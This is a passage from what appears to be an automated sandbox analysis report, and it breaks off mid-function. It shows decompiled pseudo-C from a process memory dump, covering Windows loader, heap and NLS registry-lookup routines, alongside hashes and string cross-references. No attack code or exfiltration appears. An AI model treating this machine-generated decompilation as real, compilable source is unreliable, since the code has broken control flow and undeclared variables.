                                                                                                                          • Instruction ID: 597c9af7529c3a186623dc0d09680eda38b30c95f7b9ad17409249b76328b420
                                                                                                                          • Opcode Fuzzy Hash: a5625c4562ce0b7468ecfcf23a6f9e9fe7b058ecbfa490f7c620fa896da582b2
                                                                                                                          • Instruction Fuzzy Hash: 255124341002608AE374CF2ECC5577277F5EB88745F68C899E8CA8B282D639D847EB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E009CE620(void* __ecx, short* __edx, short* _a4) {
                                                                                                                          				char _v16;
                                                                                                                          				char _v20;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				char* _v28;
                                                                                                                          				char _v32;
                                                                                                                          				char _v36;
                                                                                                                          				char _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				intOrPtr _v52;
                                                                                                                          				void* _v56;
                                                                                                                          				void* _v60;
                                                                                                                          				char _v64;
                                                                                                                          				void* _v68;
                                                                                                                          				void* _v76;
                                                                                                                          				void* _v84;
                                                                                                                          				signed int _t59;
                                                                                                                          				signed int _t74;
                                                                                                                          				signed short* _t75;
                                                                                                                          				signed int _t76;
                                                                                                                          				signed short* _t78;
                                                                                                                          				signed int _t83;
                                                                                                                          				short* _t93;
                                                                                                                          				signed short* _t94;
                                                                                                                          				short* _t96;
                                                                                                                          				void* _t97;
                                                                                                                          				signed int _t99;
                                                                                                                          				void* _t101;
                                                                                                                          				void* _t102;
                                                                                                                          
                                                                                                                          				_t80 = __ecx;
                                                                                                                          				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                                                                                          				_t96 = __edx;
                                                                                                                          				_v44 = __edx;
                                                                                                                          				_t78 = 0;
                                                                                                                          				_v56 = 0;
                                                                                                                          				if(__ecx == 0 || __edx == 0) {
                                                                                                                          					L28:
                                                                                                                          					_t97 = 0xc000000d;
                                                                                                                          				} else {
                                                                                                                          					_t93 = _a4;
                                                                                                                          					if(_t93 == 0) {
                                                                                                                          						goto L28;
                                                                                                                          					}
                                                                                                                          					_t78 = E009CF358(__ecx, 0xac);
                                                                                                                          					if(_t78 == 0) {
                                                                                                                          						_t97 = 0xc0000017;
                                                                                                                          						L6:
                                                                                                                          						if(_v56 != 0) {
                                                                                                                          							_push(_v56);
                                                                                                                          							E00A095D0();
                                                                                                                          						}
                                                                                                                          						if(_t78 != 0) {
                                                                                                                          							L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                                                                                          						}
                                                                                                                          						return _t97;
                                                                                                                          					}
                                                                                                                          					E00A0FA60(_t78, 0, 0x158);
                                                                                                                          					_v48 = _v48 & 0x00000000;
                                                                                                                          					_t102 = _t101 + 0xc;
                                                                                                                          					 *_t96 = 0;
                                                                                                                          					 *_t93 = 0;
                                                                                                                          					E00A0BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                                                                                          					_v36 = 0x18;
                                                                                                                          					_v28 =  &_v44;
                                                                                                                          					_v64 = 0;
                                                                                                                          					_push( &_v36);
                                                                                                                          					_push(0x20019);
                                                                                                                          					_v32 = 0;
                                                                                                                          					_push( &_v64);
                                                                                                                          					_v24 = 0x40;
                                                                                                                          					_v20 = 0;
                                                                                                                          					_v16 = 0;
                                                                                                                          					_t97 = E00A09600();
                                                                                                                          					if(_t97 < 0) {
                                                                                                                          						goto L6;
                                                                                                                          					}
                                                                                                                          					E00A0BB40(0,  &_v36, L"InstallLanguageFallback");
                                                                                                                          					_push(0);
                                                                                                                          					_v48 = 4;
                                                                                                                          					_t97 = L009CF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                                                                                          					if(_t97 >= 0) {
                                                                                                                          						if(_v52 != 1) {
                                                                                                                          							L17:
                                                                                                                          							_t97 = 0xc0000001;
                                                                                                                          							goto L6;
                                                                                                                          						}
                                                                                                                          						_t59 =  *_t78 & 0x0000ffff;
                                                                                                                          						_t94 = _t78;
                                                                                                                          						_t83 = _t59;
                                                                                                                          						if(_t59 == 0) {
                                                                                                                          							L19:
                                                                                                                          							if(_t83 == 0) {
                                                                                                                          								L23:
                                                                                                                          								E00A0BB40(_t83, _t102 + 0x24, _t78);
                                                                                                                          								if(L009D43C0( &_v48,  &_v64) == 0) {
                                                                                                                          									goto L17;
                                                                                                                          								}
                                                                                                                          								_t84 = _v48;
                                                                                                                          								 *_v48 = _v56;
                                                                                                                          								if( *_t94 != 0) {
                                                                                                                          									E00A0BB40(_t84, _t102 + 0x24, _t94);
                                                                                                                          									if(L009D43C0( &_v48,  &_v64) != 0) {
                                                                                                                          										 *_a4 = _v56;
                                                                                                                          									} else {
                                                                                                                          										_t97 = 0xc0000001;
                                                                                                                          										 *_v48 = 0;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								goto L6;
                                                                                                                          							}
                                                                                                                          							_t83 = _t83 & 0x0000ffff;
                                                                                                                          							while(_t83 == 0x20) {
                                                                                                                          								_t94 =  &(_t94[1]);
                                                                                                                          								_t74 =  *_t94 & 0x0000ffff;
                                                                                                                          								_t83 = _t74;
                                                                                                                          								if(_t74 != 0) {
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          								goto L23;
                                                                                                                          							}
                                                                                                                          							goto L23;
                                                                                                                          						} else {
                                                                                                                          							goto L14;
                                                                                                                          						}
                                                                                                                          						while(1) {
                                                                                                                          							L14:
                                                                                                                          							_t27 =  &(_t94[1]); // 0x2
                                                                                                                          							_t75 = _t27;
                                                                                                                          							if(_t83 == 0x2c) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							_t94 = _t75;
                                                                                                                          							_t76 =  *_t94 & 0x0000ffff;
                                                                                                                          							_t83 = _t76;
                                                                                                                          							if(_t76 != 0) {
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							goto L23;
                                                                                                                          						}
                                                                                                                          						 *_t94 = 0;
                                                                                                                          						_t94 = _t75;
                                                                                                                          						_t83 =  *_t75 & 0x0000ffff;
                                                                                                                          						goto L19;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}
































                                                                                                                          Strings
                                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 009CE68C
                                                                                                                          • @, xrefs: 009CE6C0
                                                                                                                          • InstallLanguageFallback, xrefs: 009CE6DB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                          • API String ID: 0-1757540487
                                                                                                                          • Opcode ID: f5ac120303488ae55e7f4875f38d3ec667b3c41985012310b4c9c3d606eec20c
                                                                                                                          • Instruction ID: 2e3474d36dcb7f916bb6192af6390b71faa52f87a9cc165b0019debd2a269b0a
                                                                                                                          • Opcode Fuzzy Hash: f5ac120303488ae55e7f4875f38d3ec667b3c41985012310b4c9c3d606eec20c
                                                                                                                          • Instruction Fuzzy Hash: FE518D769183559BC714EF68D440BABB3E9BF88714F05093EF989E7240E734DD4487A2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 60%
                                                                                                                          			E009EB8E4(unsigned int __edx) {
                                                                                                                          				void* __ecx;
                                                                                                                          				void* __edi;
                                                                                                                          				intOrPtr* _t16;
                                                                                                                          				intOrPtr _t18;
                                                                                                                          				void* _t27;
                                                                                                                          				void* _t28;
                                                                                                                          				unsigned int _t30;
                                                                                                                          				intOrPtr* _t31;
                                                                                                                          				unsigned int _t38;
                                                                                                                          				void* _t39;
                                                                                                                          				unsigned int _t40;
                                                                                                                          
                                                                                                                          				_t40 = __edx;
                                                                                                                          				_t39 = _t28;
                                                                                                                          				if( *0xab8748 >= 1) {
                                                                                                                          					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
                                                                                                                          					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
                                                                                                                          						_t18 =  *[fs:0x30];
                                                                                                                          						__eflags =  *(_t18 + 0xc);
                                                                                                                          						if( *(_t18 + 0xc) == 0) {
                                                                                                                          							_push("HEAP: ");
                                                                                                                          							E009CB150();
                                                                                                                          						} else {
                                                                                                                          							E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          						}
                                                                                                                          						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
                                                                                                                          						E009CB150();
                                                                                                                          						__eflags =  *0xab7bc8;
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							E00A82073(_t27, 1, _t39, __eflags);
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_t38 =  *(_t39 + 0xb8);
                                                                                                                          				if(_t38 != 0) {
                                                                                                                          					_t13 = _t40 >> 0xc;
                                                                                                                          					__eflags = _t13;
                                                                                                                          					while(1) {
                                                                                                                          						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
                                                                                                                          						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
                                                                                                                          							break;
                                                                                                                          						}
                                                                                                                          						_t30 =  *_t38;
                                                                                                                          						__eflags = _t30;
                                                                                                                          						if(_t30 != 0) {
                                                                                                                          							_t38 = _t30;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
                                                                                                                          						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					return E009EAB40(_t39, _t38, 0, _t13, _t40);
                                                                                                                          				} else {
                                                                                                                          					_t31 = _t39 + 0x8c;
                                                                                                                          					_t16 =  *_t31;
                                                                                                                          					while(_t31 != _t16) {
                                                                                                                          						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
                                                                                                                          						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
                                                                                                                          							return _t16;
                                                                                                                          						}
                                                                                                                          						_t16 =  *_t16;
                                                                                                                          					}
                                                                                                                          					return _t31;
                                                                                                                          				}
                                                                                                                          			}















                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                          • API String ID: 0-2558761708
                                                                                                                          • Opcode ID: c0c7a033180637aadfc708f2cf88e0306db6ec3d52cdd8c7cdbfc507ef65af11
                                                                                                                          • Instruction ID: 36c42ebba69f18db061ca0e9c65926e0ea715168a8bc3856f15387a4789f1d49
                                                                                                                          • Opcode Fuzzy Hash: c0c7a033180637aadfc708f2cf88e0306db6ec3d52cdd8c7cdbfc507ef65af11
                                                                                                                          • Instruction Fuzzy Hash: 9111B1317041419FD71ADB1AC495B3AB3A9EB80728F298129F14ACB252DB34DC44D781
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 87%
                                                                                                                          			E009DD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                                                                                                          				signed int _v8;
                                                                                                                          				intOrPtr _v20;
                                                                                                                          				signed int _v36;
                                                                                                                          				intOrPtr* _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed char _v52;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				intOrPtr _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				intOrPtr _v100;
                                                                                                                          				intOrPtr _v104;
                                                                                                                          				signed int _v108;
                                                                                                                          				signed int _v112;
                                                                                                                          				signed int _v116;
                                                                                                                          				intOrPtr _v120;
                                                                                                                          				signed int _v132;
                                                                                                                          				char _v140;
                                                                                                                          				char _v144;
                                                                                                                          				char _v157;
                                                                                                                          				signed int _v164;
                                                                                                                          				signed int _v168;
                                                                                                                          				signed int _v169;
                                                                                                                          				intOrPtr _v176;
                                                                                                                          				signed int _v180;
                                                                                                                          				signed int _v184;
                                                                                                                          				intOrPtr _v188;
                                                                                                                          				signed int _v192;
                                                                                                                          				signed int _v200;
                                                                                                                          				signed int _v208;
                                                                                                                          				intOrPtr* _v212;
                                                                                                                          				char _v216;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				void* __ebp;
                                                                                                                          				signed int _t204;
                                                                                                                          				void* _t208;
                                                                                                                          				signed int _t211;
                                                                                                                          				signed int _t216;
                                                                                                                          				intOrPtr _t217;
                                                                                                                          				intOrPtr* _t218;
                                                                                                                          				signed int _t226;
                                                                                                                          				signed int _t239;
                                                                                                                          				signed int* _t247;
                                                                                                                          				signed int _t249;
                                                                                                                          				void* _t252;
                                                                                                                          				signed int _t256;
                                                                                                                          				signed int _t269;
                                                                                                                          				signed int _t271;
                                                                                                                          				signed int _t277;
                                                                                                                          				signed int _t279;
                                                                                                                          				intOrPtr _t283;
                                                                                                                          				signed int _t287;
                                                                                                                          				signed int _t288;
                                                                                                                          				void* _t289;
                                                                                                                          				signed char _t290;
                                                                                                                          				signed int _t292;
                                                                                                                          				signed int* _t293;
                                                                                                                          				signed int _t306;
                                                                                                                          				signed int _t307;
                                                                                                                          				signed int _t308;
                                                                                                                          				signed int _t309;
                                                                                                                          				signed int _t310;
                                                                                                                          				intOrPtr _t311;
                                                                                                                          				intOrPtr _t312;
                                                                                                                          				signed int _t319;
                                                                                                                          				signed int _t320;
                                                                                                                          				signed int* _t324;
                                                                                                                          				signed int _t337;
                                                                                                                          				signed int _t338;
                                                                                                                          				signed int _t339;
                                                                                                                          				signed int* _t340;
                                                                                                                          				void* _t341;
                                                                                                                          				signed int _t344;
                                                                                                                          				signed int _t348;
                                                                                                                          				signed int _t349;
                                                                                                                          				signed int _t351;
                                                                                                                          				intOrPtr _t353;
                                                                                                                          				void* _t354;
                                                                                                                          				signed int _t356;
                                                                                                                          				signed int _t358;
                                                                                                                          				intOrPtr _t359;
                                                                                                                          				signed int _t363;
                                                                                                                          				signed short* _t365;
                                                                                                                          				void* _t367;
                                                                                                                          				intOrPtr _t369;
                                                                                                                          				void* _t370;
                                                                                                                          				signed int _t371;
                                                                                                                          				signed int _t372;
                                                                                                                          				void* _t374;
                                                                                                                          				signed int _t376;
                                                                                                                          				void* _t384;
                                                                                                                          				signed int _t387;
                                                                                                                          
                                                                                                                          				_v8 =  *0xabd360 ^ _t376;
                                                                                                                          				_t2 =  &_a20;
                                                                                                                          				 *_t2 = _a20 & 0x00000001;
                                                                                                                          				_t287 = _a4;
                                                                                                                          				_v200 = _a12;
                                                                                                                          				_t365 = _a8;
                                                                                                                          				_v212 = _a16;
                                                                                                                          				_v180 = _a24;
                                                                                                                          				_v168 = 0;
                                                                                                                          				_v157 = 0;
                                                                                                                          				if( *_t2 != 0) {
                                                                                                                          					__eflags = E009D6600(0xab52d8);
                                                                                                                          					if(__eflags == 0) {
                                                                                                                          						goto L1;
                                                                                                                          					} else {
                                                                                                                          						_v188 = 6;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					L1:
                                                                                                                          					_v188 = 9;
                                                                                                                          				}
                                                                                                                          				if(_t365 == 0) {
                                                                                                                          					_v164 = 0;
                                                                                                                          					goto L5;
                                                                                                                          				} else {
                                                                                                                          					_t363 =  *_t365 & 0x0000ffff;
                                                                                                                          					_t341 = _t363 + 1;
                                                                                                                          					if((_t365[1] & 0x0000ffff) < _t341) {
                                                                                                                          						L109:
                                                                                                                          						__eflags = _t341 - 0x80;
                                                                                                                          						if(_t341 <= 0x80) {
                                                                                                                          							_t281 =  &_v140;
                                                                                                                          							_v164 =  &_v140;
                                                                                                                          							goto L114;
                                                                                                                          						} else {
                                                                                                                          							_t283 =  *0xab7b9c; // 0x0
                                                                                                                          							_t281 = L009E4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                                                                                                          							_v164 = _t281;
                                                                                                                          							__eflags = _t281;
                                                                                                                          							if(_t281 != 0) {
                                                                                                                          								_v157 = 1;
                                                                                                                          								L114:
                                                                                                                          								E00A0F3E0(_t281, _t365[2], _t363);
                                                                                                                          								_t200 = _v164;
                                                                                                                          								 *((char*)(_v164 + _t363)) = 0;
                                                                                                                          								goto L5;
                                                                                                                          							} else {
                                                                                                                          								_t204 = 0xc000009a;
                                                                                                                          								goto L47;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						_t200 = _t365[2];
                                                                                                                          						_v164 = _t200;
                                                                                                                          						if( *((char*)(_t200 + _t363)) != 0) {
                                                                                                                          							goto L109;
                                                                                                                          						} else {
                                                                                                                          							while(1) {
                                                                                                                          								L5:
                                                                                                                          								_t353 = 0;
                                                                                                                          								_t342 = 0x1000;
                                                                                                                          								_v176 = 0;
                                                                                                                          								if(_t287 == 0) {
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								_t384 = _t287 -  *0xab7b90; // 0x77df0000
                                                                                                                          								if(_t384 == 0) {
                                                                                                                          									_t353 =  *0xab7b8c; // 0x442b30
                                                                                                                          									_v176 = _t353;
                                                                                                                          									_t320 = ( *(_t353 + 0x50))[8];
                                                                                                                          									_v184 = _t320;
                                                                                                                          								} else {
                                                                                                                          									E009E2280(_t200, 0xab84d8);
                                                                                                                          									_t277 =  *0xab85f4; // 0x443020
                                                                                                                          									_t351 =  *0xab85f8 & 1;
                                                                                                                          									while(_t277 != 0) {
                                                                                                                          										_t337 =  *(_t277 - 0x50);
                                                                                                                          										if(_t337 > _t287) {
                                                                                                                          											_t338 = _t337 | 0xffffffff;
                                                                                                                          										} else {
                                                                                                                          											asm("sbb ecx, ecx");
                                                                                                                          											_t338 =  ~_t337;
                                                                                                                          										}
                                                                                                                          										_t387 = _t338;
                                                                                                                          										if(_t387 < 0) {
                                                                                                                          											_t339 =  *_t277;
                                                                                                                          											__eflags = _t351;
                                                                                                                          											if(_t351 != 0) {
                                                                                                                          												__eflags = _t339;
                                                                                                                          												if(_t339 == 0) {
                                                                                                                          													goto L16;
                                                                                                                          												} else {
                                                                                                                          													goto L118;
                                                                                                                          												}
                                                                                                                          												goto L151;
                                                                                                                          											} else {
                                                                                                                          												goto L16;
                                                                                                                          											}
                                                                                                                          											goto L17;
                                                                                                                          										} else {
                                                                                                                          											if(_t387 <= 0) {
                                                                                                                          												__eflags = _t277;
                                                                                                                          												if(_t277 != 0) {
                                                                                                                          													_t340 =  *(_t277 - 0x18);
                                                                                                                          													_t24 = _t277 - 0x68; // 0x442fb8
                                                                                                                          													_t353 = _t24;
                                                                                                                          													_v176 = _t353;
                                                                                                                          													__eflags = _t340[3] - 0xffffffff;
                                                                                                                          													if(_t340[3] != 0xffffffff) {
                                                                                                                          														_t279 =  *_t340;
                                                                                                                          														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                                                                                                          														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                                                                                                          															asm("lock inc dword [edi+0x9c]");
                                                                                                                          															_t340 =  *(_t353 + 0x50);
                                                                                                                          														}
                                                                                                                          													}
                                                                                                                          													_v184 = _t340[8];
                                                                                                                          												}
                                                                                                                          											} else {
                                                                                                                          												_t339 =  *(_t277 + 4);
                                                                                                                          												if(_t351 != 0) {
                                                                                                                          													__eflags = _t339;
                                                                                                                          													if(_t339 == 0) {
                                                                                                                          														goto L16;
                                                                                                                          													} else {
                                                                                                                          														L118:
                                                                                                                          														_t277 = _t277 ^ _t339;
                                                                                                                          														goto L17;
                                                                                                                          													}
                                                                                                                          													goto L151;
                                                                                                                          												} else {
                                                                                                                          													L16:
                                                                                                                          													_t277 = _t339;
                                                                                                                          												}
                                                                                                                          												goto L17;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          										goto L25;
                                                                                                                          										L17:
                                                                                                                          									}
                                                                                                                          									L25:
                                                                                                                          									E009DFFB0(_t287, _t353, 0xab84d8);
                                                                                                                          									_t320 = _v184;
                                                                                                                          									_t342 = 0x1000;
                                                                                                                          								}
                                                                                                                          								if(_t353 == 0) {
                                                                                                                          									break;
                                                                                                                          								} else {
                                                                                                                          									_t366 = 0;
                                                                                                                          									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                                                                                                          										_t288 = _v164;
                                                                                                                          										if(_t353 != 0) {
                                                                                                                          											_t342 = _t288;
                                                                                                                          											_t374 = E00A1CC99(_t353, _t288, _v200, 1,  &_v168);
                                                                                                                          											if(_t374 >= 0) {
                                                                                                                          												if(_v184 == 7) {
                                                                                                                          													__eflags = _a20;
                                                                                                                          													if(__eflags == 0) {
                                                                                                                          														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                                                                                                          														if(__eflags != 0) {
                                                                                                                          															_t271 = E009D6600(0xab52d8);
                                                                                                                          															__eflags = _t271;
                                                                                                                          															if(__eflags == 0) {
                                                                                                                          																_t342 = 0;
                                                                                                                          																_v169 = _t271;
                                                                                                                          																_t374 = E009D7926( *(_t353 + 0x50), 0,  &_v169);
                                                                                                                          															}
                                                                                                                          														}
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												if(_t374 < 0) {
                                                                                                                          													_v168 = 0;
                                                                                                                          												} else {
                                                                                                                          													if( *0xabb239 != 0) {
                                                                                                                          														_t342 =  *(_t353 + 0x18);
                                                                                                                          														E00A4E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                                                                                                          													}
                                                                                                                          													if( *0xab8472 != 0) {
                                                                                                                          														_v192 = 0;
                                                                                                                          														_t342 =  *0x7ffe0330;
                                                                                                                          														asm("ror edi, cl");
                                                                                                                          														 *0xabb1e0( &_v192, _t353, _v168, 0, _v180);
                                                                                                                          														 *( *0xabb218 ^  *0x7ffe0330)();
                                                                                                                          														_t269 = _v192;
                                                                                                                          														_t353 = _v176;
                                                                                                                          														__eflags = _t269;
                                                                                                                          														if(__eflags != 0) {
                                                                                                                          															_v168 = _t269;
                                                                                                                          														}
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                                                                                                          												_t366 = 0xc000007a;
                                                                                                                          											}
                                                                                                                          											_t247 =  *(_t353 + 0x50);
                                                                                                                          											if(_t247[3] == 0xffffffff) {
                                                                                                                          												L40:
                                                                                                                          												if(_t366 == 0xc000007a) {
                                                                                                                          													__eflags = _t288;
                                                                                                                          													if(_t288 == 0) {
                                                                                                                          														goto L136;
                                                                                                                          													} else {
                                                                                                                          														_t366 = 0xc0000139;
                                                                                                                          													}
                                                                                                                          													goto L54;
                                                                                                                          												}
                                                                                                                          											} else {
                                                                                                                          												_t249 =  *_t247;
                                                                                                                          												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                                                                                                          													goto L40;
                                                                                                                          												} else {
                                                                                                                          													_t250 = _t249 | 0xffffffff;
                                                                                                                          													asm("lock xadd [edi+0x9c], eax");
                                                                                                                          													if((_t249 | 0xffffffff) == 0) {
                                                                                                                          														E009E2280(_t250, 0xab84d8);
                                                                                                                          														_t342 =  *(_t353 + 0x54);
                                                                                                                          														_t165 = _t353 + 0x54; // 0x54
                                                                                                                          														_t252 = _t165;
                                                                                                                          														__eflags =  *(_t342 + 4) - _t252;
                                                                                                                          														if( *(_t342 + 4) != _t252) {
                                                                                                                          															L135:
                                                                                                                          															asm("int 0x29");
                                                                                                                          															L136:
                                                                                                                          															_t288 = _v200;
                                                                                                                          															_t366 = 0xc0000138;
                                                                                                                          															L54:
                                                                                                                          															_t342 = _t288;
                                                                                                                          															L00A03898(0, _t288, _t366);
                                                                                                                          														} else {
                                                                                                                          															_t324 =  *(_t252 + 4);
                                                                                                                          															__eflags =  *_t324 - _t252;
                                                                                                                          															if( *_t324 != _t252) {
                                                                                                                          																goto L135;
                                                                                                                          															} else {
                                                                                                                          																 *_t324 = _t342;
                                                                                                                          																 *(_t342 + 4) = _t324;
                                                                                                                          																_t293 =  *(_t353 + 0x50);
                                                                                                                          																_v180 =  *_t293;
                                                                                                                          																E009DFFB0(_t293, _t353, 0xab84d8);
                                                                                                                          																__eflags =  *((short*)(_t353 + 0x3a));
                                                                                                                          																if( *((short*)(_t353 + 0x3a)) != 0) {
                                                                                                                          																	_t342 = 0;
                                                                                                                          																	__eflags = 0;
                                                                                                                          																	E00A037F5(_t353, 0);
                                                                                                                          																}
                                                                                                                          																E00A00413(_t353);
                                                                                                                          																_t256 =  *(_t353 + 0x48);
                                                                                                                          																__eflags = _t256;
                                                                                                                          																if(_t256 != 0) {
                                                                                                                          																	__eflags = _t256 - 0xffffffff;
                                                                                                                          																	if(_t256 != 0xffffffff) {
                                                                                                                          																		E009F9B10(_t256);
                                                                                                                          																	}
                                                                                                                          																}
                                                                                                                          																__eflags =  *(_t353 + 0x28);
                                                                                                                          																if( *(_t353 + 0x28) != 0) {
                                                                                                                          																	_t174 = _t353 + 0x24; // 0x24
                                                                                                                          																	E009F02D6(_t174);
                                                                                                                          																}
                                                                                                                          																L009E77F0( *0xab7b98, 0, _t353);
                                                                                                                          																__eflags = _v180 - _t293;
                                                                                                                          																if(__eflags == 0) {
                                                                                                                          																	E009FC277(_t293, _t366);
                                                                                                                          																}
                                                                                                                          																_t288 = _v164;
                                                                                                                          																goto L40;
                                                                                                                          															}
                                                                                                                          														}
                                                                                                                          													} else {
                                                                                                                          														goto L40;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										L009DEC7F(_t353);
                                                                                                                          										L009F19B8(_t287, 0, _t353, 0);
                                                                                                                          										_t200 = E009CF4E3(__eflags);
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								L41:
                                                                                                                          								if(_v157 != 0) {
                                                                                                                          									L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                                                                                                          								}
                                                                                                                          								if(_t366 < 0 || ( *0xabb2f8 |  *0xabb2fc) == 0 || ( *0xabb2e4 & 0x00000001) != 0) {
                                                                                                                          									L46:
                                                                                                                          									 *_v212 = _v168;
                                                                                                                          									_t204 = _t366;
                                                                                                                          									L47:
                                                                                                                          									_pop(_t354);
                                                                                                                          									_pop(_t367);
                                                                                                                          									_pop(_t289);
                                                                                                                          									return E00A0B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                                                                                                          								} else {
                                                                                                                          									_v200 = 0;
                                                                                                                          									if(( *0xabb2ec >> 0x00000008 & 0x00000003) == 3) {
                                                                                                                          										_t355 = _v168;
                                                                                                                          										_t342 =  &_v208;
                                                                                                                          										_t208 = E00A76B68(_v168,  &_v208, _v168, __eflags);
                                                                                                                          										__eflags = _t208 - 1;
                                                                                                                          										if(_t208 == 1) {
                                                                                                                          											goto L46;
                                                                                                                          										} else {
                                                                                                                          											__eflags = _v208 & 0x00000010;
                                                                                                                          											if((_v208 & 0x00000010) == 0) {
                                                                                                                          												goto L46;
                                                                                                                          											} else {
                                                                                                                          												_t342 = 4;
                                                                                                                          												_t366 = E00A76AEB(_t355, 4,  &_v216);
                                                                                                                          												__eflags = _t366;
                                                                                                                          												if(_t366 >= 0) {
                                                                                                                          													goto L46;
                                                                                                                          												} else {
                                                                                                                          													asm("int 0x29");
                                                                                                                          													_t356 = 0;
                                                                                                                          													_v44 = 0;
                                                                                                                          													_t290 = _v52;
                                                                                                                          													__eflags = 0;
                                                                                                                          													if(0 == 0) {
                                                                                                                          														L108:
                                                                                                                          														_t356 = 0;
                                                                                                                          														_v44 = 0;
                                                                                                                          														goto L63;
                                                                                                                          													} else {
                                                                                                                          														__eflags = 0;
                                                                                                                          														if(0 < 0) {
                                                                                                                          															goto L108;
                                                                                                                          														}
                                                                                                                          														L63:
                                                                                                                          														_v112 = _t356;
                                                                                                                          														__eflags = _t356;
                                                                                                                          														if(_t356 == 0) {
                                                                                                                          															L143:
                                                                                                                          															_v8 = 0xfffffffe;
                                                                                                                          															_t211 = 0xc0000089;
                                                                                                                          														} else {
                                                                                                                          															_v36 = 0;
                                                                                                                          															_v60 = 0;
                                                                                                                          															_v48 = 0;
                                                                                                                          															_v68 = 0;
                                                                                                                          															_v44 = _t290 & 0xfffffffc;
                                                                                                                          															E009DE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                                                                                                          															_t306 = _v68;
                                                                                                                          															__eflags = _t306;
                                                                                                                          															if(_t306 == 0) {
                                                                                                                          																_t216 = 0xc000007b;
                                                                                                                          																_v36 = 0xc000007b;
                                                                                                                          																_t307 = _v60;
                                                                                                                          															} else {
                                                                                                                          																__eflags = _t290 & 0x00000001;
                                                                                                                          																if(__eflags == 0) {
                                                                                                                          																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                                                                                                          																	__eflags = _t349 - 0x10b;
                                                                                                                          																	if(_t349 != 0x10b) {
                                                                                                                          																		__eflags = _t349 - 0x20b;
                                                                                                                          																		if(_t349 == 0x20b) {
                                                                                                                          																			goto L102;
                                                                                                                          																		} else {
                                                                                                                          																			_t307 = 0;
                                                                                                                          																			_v48 = 0;
                                                                                                                          																			_t216 = 0xc000007b;
